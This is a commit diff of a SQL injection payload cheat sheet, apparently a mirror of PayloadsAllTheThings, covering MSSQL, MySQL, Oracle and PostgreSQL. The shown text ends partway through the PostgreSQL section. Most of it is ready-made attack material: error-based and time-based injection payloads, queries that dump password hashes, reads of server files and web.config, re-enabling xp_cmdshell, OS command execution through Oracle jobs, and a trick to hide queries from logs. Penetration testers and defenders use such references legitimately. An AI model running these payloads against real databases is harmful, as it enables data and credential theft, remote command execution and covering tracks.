mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
SQL - File Manipulation and Error Based Injection
This commit is contained in:
parent
9a908a15d2
commit
3c5bab0338
@ -7,18 +7,19 @@
|
||||
|
||||
* [MSSQL Default Databases](#mssql-default-databases)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL Database Credentials](#mssql-database-credentials)
|
||||
* [MSSQL Enumeration](#mssql-enumeration)
|
||||
* [MSSQL List Databases](#mssql-list-databases)
|
||||
* [MSSQL List Columns](#mssql-list-columns)
|
||||
* [MSSQL List Tables](#mssql-list-tables)
|
||||
* [MSSQL List Columns](#mssql-list-columns)
|
||||
* [MSSQL Union Based](#mssql-union-based)
|
||||
* [MSSQL Error Based](#mssql-error-based)
|
||||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked Query](#mssql-stacked-query)
|
||||
* [MSSQL Read File](#mssql-read-file)
|
||||
* [MSSQL File Manipulation](#mssql-file-manipulation)
|
||||
* [MSSQL Read File](#mssql-read-file)
|
||||
* [MSSQL Write File](#mssql-write-file)
|
||||
* [MSSQL Command Execution](#mssql-command-execution)
|
||||
* [XP_CMDSHELL](#xp_cmdshell)
|
||||
* [Python Script](#python-script)
|
||||
@ -29,6 +30,8 @@
|
||||
* [MSSQL Privileges](#mssql-privileges)
|
||||
* [MSSQL List Permissions](#mssql-list-permissions)
|
||||
* [MSSQL Make User DBA](#mssql-make-user-dba)
|
||||
* [MSSQL Database Credentials](#mssql-database-credentials)
|
||||
* [MSSQL OPSEC](#mssql-opsec)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -49,47 +52,34 @@
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `/* MSSQL Comment */` | C-style comment |
|
||||
| `-- -` | SQL comment |
|
||||
| `--` | SQL comment |
|
||||
| `;%00` | Null byte |
|
||||
|
||||
|
||||
## MSSQL Database Credentials
|
||||
|
||||
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
|
||||
```
|
||||
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ------------- | ----------------------------------------- |
|
||||
| DBMS version | `SELECT @@version` |
|
||||
| Database name | `SELECT DB_NAME()` |
|
||||
| Hostname | `SELECT HOST_NAME()` |
|
||||
| Hostname | `SELECT @@hostname` |
|
||||
| Hostname | `SELECT @@SERVERNAME` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('edition')` |
|
||||
| User | `SELECT CURRENT_USER` |
|
||||
| User | `SELECT user_name();` |
|
||||
| User | `SELECT system_user;` |
|
||||
| User | `SELECT user;` |
|
||||
| Description | SQL Query |
|
||||
| --------------- | ----------------------------------------- |
|
||||
| DBMS version | `SELECT @@version` |
|
||||
| Database name | `SELECT DB_NAME()` |
|
||||
| Database schema | `SELECT SCHEMA_NAME()` |
|
||||
| Hostname | `SELECT HOST_NAME()` |
|
||||
| Hostname | `SELECT @@hostname` |
|
||||
| Hostname | `SELECT @@SERVERNAME` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('edition')` |
|
||||
| User | `SELECT CURRENT_USER` |
|
||||
| User | `SELECT user_name();` |
|
||||
| User | `SELECT system_user;` |
|
||||
| User | `SELECT user;` |
|
||||
|
||||
|
||||
### MSSQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysdatabases;
|
||||
SELECT name FROM master.sys.databases;
|
||||
|
||||
-- for N = 0, 1, 2, …
|
||||
SELECT DB_NAME(N);
|
||||
@ -99,6 +89,25 @@ SELECT DB_NAME(N);
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
|
||||
```
|
||||
|
||||
### MSSQL List Tables
|
||||
|
||||
```sql
|
||||
-- use xtype = 'V' for views
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U';
|
||||
SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
SELECT table_name FROM information_schema.tables WHERE table_catalog='<DBNAME>'
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
```
|
||||
|
||||
|
||||
### MSSQL List Columns
|
||||
|
||||
```sql
|
||||
@ -109,23 +118,8 @@ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, column_name FROM information_schema.columns
|
||||
```
|
||||
|
||||
### MSSQL List Tables
|
||||
|
||||
```sql
|
||||
-- use xtype = 'V' for views
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U';
|
||||
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
|
||||
```
|
||||
|
||||
|
||||
@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
|
||||
## MSSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| CONVERT | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` |
|
||||
| IN | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` |
|
||||
| EQUAL | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` |
|
||||
| CAST | `CAST((SELECT @@version) AS INT)` |
|
||||
|
||||
* For integer inputs
|
||||
|
||||
```sql
|
||||
@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Read File
|
||||
## MSSQL File Manipulation
|
||||
|
||||
### MSSQL Read File
|
||||
|
||||
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
|
||||
|
||||
|
||||
```sql
|
||||
OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
|
||||
```
|
||||
|
||||
Example:
|
||||
|
||||
```sql
|
||||
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
|
||||
```
|
||||
|
||||
|
||||
### MSSQL Write File
|
||||
|
||||
```sql
|
||||
execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Command Execution
|
||||
|
||||
### XP_CMDSHELL
|
||||
@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
|
||||
```
|
||||
|
||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005)
|
||||
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options',1;
|
||||
@ -282,7 +299,6 @@ RECONFIGURE;
|
||||
> Executed by a different user than the one using `xp_cmdshell` to execute commands
|
||||
|
||||
```powershell
|
||||
# Print the user being used (and execute commands)
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||||
@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Database Credentials
|
||||
|
||||
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
|
||||
```
|
||||
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
|
||||
## MSSQL OPSEC
|
||||
|
||||
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
|
||||
|
@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
|
||||
| `/* MYSQL Comment */` | C-style comment |
|
||||
| `/*! MYSQL Special SQL */` | Special SQL |
|
||||
| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 |
|
||||
| `-- -` | SQL comment |
|
||||
| `--` | SQL comment |
|
||||
| `;%00` | Nullbyte |
|
||||
| \` | Backtick |
|
||||
|
||||
@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
|
||||
|
||||
## MYSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| GTID_SUBSET | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` |
|
||||
| JSON_KEYS | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` |
|
||||
| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` |
|
||||
| UPDATEXML | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` |
|
||||
| EXP | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` |
|
||||
| OR | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` |
|
||||
| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
|
||||
|
||||
|
||||
### MYSQL Error Based - Basic
|
||||
|
||||
Works with `MySQL >= 4.1`
|
||||
@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL.
|
||||
RLIKE SLEEP([SLEEPTIME])
|
||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR
|
||||
AND SLEEP(10)=0
|
||||
AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR)
|
||||
```
|
||||
|
||||
### Using SLEEP in a Subselect
|
||||
@ -662,12 +675,19 @@ mysql> SELECT @@version;
|
||||
| 5.6.31-0ubuntu0.15.10.1 |
|
||||
+-------------------------+
|
||||
|
||||
mysql> mysql> SELECT version();
|
||||
mysql> SELECT version();
|
||||
+-------------------------+
|
||||
| version() |
|
||||
+-------------------------+
|
||||
| 5.6.31-0ubuntu0.15.10.1 |
|
||||
+-------------------------+
|
||||
|
||||
mysql> SELECT @@GLOBAL.VERSION;
|
||||
+------------------+
|
||||
| @@GLOBAL.VERSION |
|
||||
+------------------+
|
||||
| 8.0.27 |
|
||||
+------------------+
|
||||
```
|
||||
|
||||
|
||||
|
@ -7,13 +7,12 @@
|
||||
|
||||
* [Oracle SQL Default Databases](#oracle-sql-default-databases)
|
||||
* [Oracle SQL Comments](#oracle-sql-comments)
|
||||
* [Oracle SQL Version](#oracle-sql-version)
|
||||
* [Oracle SQL Hostname](#oracle-sql-hostname)
|
||||
* [Oracle SQL Database Name](#oracle-sql-database-name)
|
||||
* [Oracle SQL Enumeration](#oracle-sql-enumeration)
|
||||
* [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
|
||||
* [Oracle SQL List Databases](#oracle-sql-list-databases)
|
||||
* [Oracle SQL List Columns](#oracle-sql-list-columns)
|
||||
* [Oracle SQL List Tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL Methodology](#oracle-sql-methodology)
|
||||
* [Oracle SQL List Databases](#oracle-sql-list-databases)
|
||||
* [Oracle SQL List Tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL List Columns](#oracle-sql-list-columns)
|
||||
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||
* [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
|
||||
@ -22,6 +21,11 @@
|
||||
* [Oracle SQL Command Execution](#oracle-sql-command-execution)
|
||||
* [Oracle Java Execution](#oracle-java-execution)
|
||||
* [Oracle Java Class](#oracle-java-class)
|
||||
* [OracleSQL File Manipulation](#OracleSQL-file-manipulation)
|
||||
* [OracleSQL Read File](#OracleSQL-read-file)
|
||||
* [OracleSQL Write File](#OracleSQL-write-file)
|
||||
* [Package os_command](#package-os_command)
|
||||
* [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -35,39 +39,30 @@
|
||||
|
||||
## Oracle SQL Comments
|
||||
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `-- -` | SQL comment |
|
||||
| Type | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## Oracle SQL Version
|
||||
## Oracle SQL Enumeration
|
||||
|
||||
```sql
|
||||
SELECT user FROM dual UNION SELECT * FROM v$version
|
||||
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
|
||||
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
|
||||
SELECT version FROM v$instance;
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT host_name FROM v$instance; (Privileged)
|
||||
SELECT UTL_INADDR.get_host_name FROM dual;
|
||||
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
|
||||
SELECT UTL_INADDR.get_host_address FROM dual;
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT global_name FROM global_name;
|
||||
SELECT name FROM V$DATABASE;
|
||||
SELECT instance_name FROM V$INSTANCE;
|
||||
SELECT SYS.DATABASE_NAME FROM DUAL;
|
||||
```
|
||||
| Description | SQL Query |
|
||||
| ------------- | ------------------------------------------------------------ |
|
||||
| DBMS version | `SELECT user FROM dual UNION SELECT * FROM v$version` |
|
||||
| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` |
|
||||
| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` |
|
||||
| DBMS version | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;` |
|
||||
| DBMS version | `SELECT version FROM v$instance;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_name FROM dual;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_address FROM dual;` |
|
||||
| Hostname | `SELECT host_name FROM v$instance;` |
|
||||
| Database name | `SELECT global_name FROM global_name;` |
|
||||
| Database name | `SELECT name FROM V$DATABASE;` |
|
||||
| Database name | `SELECT instance_name FROM V$INSTANCE;` |
|
||||
| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` |
|
||||
| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;` |
|
||||
|
||||
|
||||
## Oracle SQL Database Credentials
|
||||
@ -79,27 +74,29 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
||||
| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
|
||||
|
||||
|
||||
## Oracle SQL List Databases
|
||||
## Oracle SQL Methodology
|
||||
|
||||
### Oracle SQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT DISTINCT owner FROM all_tables;
|
||||
SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL List Tables
|
||||
### Oracle SQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM all_tables;
|
||||
SELECT owner, table_name FROM all_tables;
|
||||
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='<DBNAME>'
|
||||
```
|
||||
|
||||
### Oracle SQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='<TABLE_NAME>' AND OWNER='<DBNAME>'
|
||||
```
|
||||
|
||||
|
||||
@ -115,6 +112,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
| SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
|
||||
| XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
|
||||
| XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
|
||||
| XMLType | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` |
|
||||
| DBMS_UTILITY | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` |
|
||||
|
||||
When the injection point is inside a string use : `'||PAYLOAD--`
|
||||
|
||||
@ -141,6 +140,7 @@ When the injection point is inside a string use : `'||PAYLOAD--`
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
|
||||
AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
|
||||
```
|
||||
|
||||
|
||||
@ -209,7 +209,38 @@ SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roo
|
||||
|
||||
```sql
|
||||
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||
```
|
||||
```
|
||||
|
||||
|
||||
### Package os_command
|
||||
|
||||
```sql
|
||||
SELECT os_command.exec_clob('<COMMAND>') cmd from dual
|
||||
```
|
||||
|
||||
### DBMS_SCHEDULER Jobs
|
||||
|
||||
```sql
|
||||
DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '<COMMAND>', enabled => TRUE)
|
||||
```
|
||||
|
||||
|
||||
## OracleSQL File Manipulation
|
||||
|
||||
:warning: Only in a stacked query.
|
||||
|
||||
### OracleSQL Read File
|
||||
|
||||
```sql
|
||||
utl_file.get_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
|
||||
```
|
||||
|
||||
### OracleSQL Write File
|
||||
|
||||
```sql
|
||||
utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
|
||||
```
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
@ -6,12 +6,8 @@
|
||||
## Summary
|
||||
|
||||
* [PostgreSQL Comments](#postgresql-comments)
|
||||
* [PostgreSQL Version](#postgresql-version)
|
||||
* [PostgreSQL Current User](#postgresql-current-user)
|
||||
* [PostgreSQL Privileges](#postgresql-privileges)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
|
||||
* [PostgreSQL Enumeration](#postgresql-enumeration)
|
||||
* [PostgreSQL Methodology](#postgresql-methodology)
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
@ -27,72 +23,65 @@
|
||||
* [Using libc.so.6](#using-libcso6)
|
||||
* [PostgreSQL WAF Bypass](#postgresql-waf-bypass)
|
||||
* [Alternative to Quotes](#alternative-to-quotes)
|
||||
* [PostgreSQL Privileges](#postgresql-privileges)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## PostgreSQL Comments
|
||||
|
||||
| Type | Comment |
|
||||
| ---- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
| Type | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
SELECT version()
|
||||
```
|
||||
|
||||
## PostgreSQL Current User
|
||||
|
||||
```sql
|
||||
SELECT user;
|
||||
SELECT current_user;
|
||||
SELECT session_user;
|
||||
SELECT usename FROM pg_user;
|
||||
SELECT getpgusername();
|
||||
```
|
||||
|
||||
|
||||
## PostgreSQL Privileges
|
||||
|
||||
### PostgreSQL List Privileges
|
||||
|
||||
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
|
||||
|
||||
```sql
|
||||
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
|
||||
```
|
||||
|
||||
### PostgreSQL Superuser Role
|
||||
|
||||
```sql
|
||||
SHOW is_superuser;
|
||||
SELECT current_setting('is_superuser');
|
||||
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
```
|
||||
|
||||
## PostgreSQL Enumeration
|
||||
|
||||
| SQL Query | Description |
|
||||
| --------------------------------------- | -------------- |
|
||||
| `SELECT current_database()` | Database Name |
|
||||
| `SELECT datname FROM pg_database` | List Databases |
|
||||
| `SELECT table_name FROM information_schema.tables` | List Tables |
|
||||
| `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | List Columns |
|
||||
| `SELECT usename FROM pg_user` | List PostgreSQL Users |
|
||||
| `SELECT usename, passwd FROM pg_shadow` | List Password Hashes |
|
||||
| `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | List Database Administrator Accounts |
|
||||
| Description | SQL Query |
|
||||
| ---------------------- | --------------------------------------- |
|
||||
| DBMS version | `SELECT version()` |
|
||||
| Database Name | `SELECT CURRENT_DATABASE()` |
|
||||
| Database Schema | `SELECT CURRENT_SCHEMA()` |
|
||||
| List PostgreSQL Users | `SELECT usename FROM pg_user` |
|
||||
| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` |
|
||||
| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` |
|
||||
| Current User | `SELECT user;` |
|
||||
| Current User | `SELECT current_user;` |
|
||||
| Current User | `SELECT session_user;` |
|
||||
| Current User | `SELECT usename FROM pg_user;` |
|
||||
| Current User | `SELECT getpgusername();` |
|
||||
|
||||
|
||||
## PostgreSQL Methodology
|
||||
|
||||
| Description | SQL Query |
|
||||
| ---------------------- | -------------------------------------------- |
|
||||
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
|
||||
| List Databases | `SELECT datname FROM pg_database` |
|
||||
| List Tables | `SELECT table_name FROM information_schema.tables` |
|
||||
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
|
||||
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
|
||||
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
|
||||
|
||||
|
||||
## PostgreSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` |
|
||||
| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` |
|
||||
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
|
||||
| CAST | `AND (SELECT version())::int=1 -- -` |
|
||||
|
||||
|
||||
|
||||
```sql
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
|
||||
CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
|
||||
CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)--
|
||||
CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)
|
||||
```
|
||||
|
||||
```sql
|
||||
@ -105,14 +94,14 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
### PostgreSQL XML Helpers
|
||||
|
||||
```sql
|
||||
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
|
||||
SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
|
||||
```
|
||||
|
||||
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
|
||||
|
||||
```sql
|
||||
select database_to_xml(true,true,''); -- dump the current database to XML
|
||||
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
|
||||
SELECT database_to_xml(true,true,''); -- dump the current database to XML
|
||||
SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
|
||||
```
|
||||
|
||||
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
|
||||
@ -166,6 +155,7 @@ select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end
|
||||
```
|
||||
|
||||
```sql
|
||||
AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
|
||||
